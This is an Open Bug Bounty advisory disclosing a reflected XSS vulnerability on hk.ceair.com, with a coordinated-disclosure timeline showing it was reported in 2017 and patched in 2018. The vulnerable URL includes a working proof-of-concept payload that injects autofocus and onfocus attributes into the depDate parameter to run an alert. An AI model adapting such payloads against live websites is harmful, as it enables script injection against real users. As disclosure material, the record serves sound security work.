hk.ceair.com XSS vulnerability

2017-10-04T13:56:00
ID OBB:322661
Type openbugbounty
Reporter amlnspqr
Modified 2018-01-03T03:44:00

Description

Vulnerable URL:
http://hk.ceair.com/muovc/newsitefront/reservation/flight-search-by-shopping!doFlightSearch.shtml?cond.tripType=OW&cond.depCode;_reveal=xxx&cond.depCode;=&cond.arrCode;_reveal=xxx&cond.arrCode;=&cond.routeType;=&depDate;="autofocus onfocus="alert(/XSSPOSED/)"
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 4 October, 2017 13:56 GMT
Generic security notifications sent to website owner| 4 October, 2017 13:58 GMT
Notification sent to subscribers (without technical details)| 4 October, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 2 January, 2018 14:24 GMT
Vulnerability patched by the website owner| 3 January, 2018 03:44 GMT